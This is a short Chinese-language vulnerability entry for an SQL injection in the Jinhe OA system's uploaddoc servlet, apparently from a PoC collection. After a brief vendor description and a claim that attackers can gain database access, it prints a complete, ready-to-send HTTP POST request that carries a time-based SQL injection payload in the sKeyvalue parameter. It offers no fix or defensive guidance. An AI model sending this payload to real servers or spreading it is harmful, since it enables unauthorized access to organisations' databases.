漏洞描述
金和网络是专业信息化服务商,为城市监管部门提供了互联网+监管解决方案,为企事业单位提供组织协同OA系统开发平台,电子政务一体化平台,智慧电商平台等服务。旗下金和OA系统存在SQL注入漏洞,攻击者可通过该漏洞获取数据库权限。
金和OA uploaddoc SQL注入漏洞
PoC代码
POST /jc6/servlet/uploaddoc HTTP/1.1
Host:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 50
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0
key=readimage&sKeyvalue=1';WAITFOR DELAY '0:0:3'--